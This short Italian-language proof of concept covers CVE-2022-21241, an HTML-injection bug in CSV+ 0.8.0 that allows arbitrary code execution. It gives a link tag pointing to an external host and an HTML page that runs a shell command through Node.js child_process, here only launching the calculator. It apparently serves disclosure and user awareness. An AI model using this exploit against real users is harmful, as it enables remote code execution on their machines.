
👻 [PoC] CSV+ 0.8.0 - Esecuzione di codice arbitrario (CVE-2022-21241)
👻 Vulnerabilità di esecuzione arbitraria di codice in 2 clic.

CVE-2022-21241
⚠
Questo PoC è stato creato per avvisare gli utenti e indagare sulle vulnerabilità nel proprio CSV+, ed è vietato utilizzarlo per attacchi.
Le seguenti versioni sono vulnerabili.
Gli attaccanti possono eseguire codice arbitrario utilizzando la funzionalità Node.js. Metteranno il codice js dannoso su un sito e lo collegheranno tramite a-tags sfruttando la vulnerabilità di HTML injection in CSV+.

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html è un link temporaneo.
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>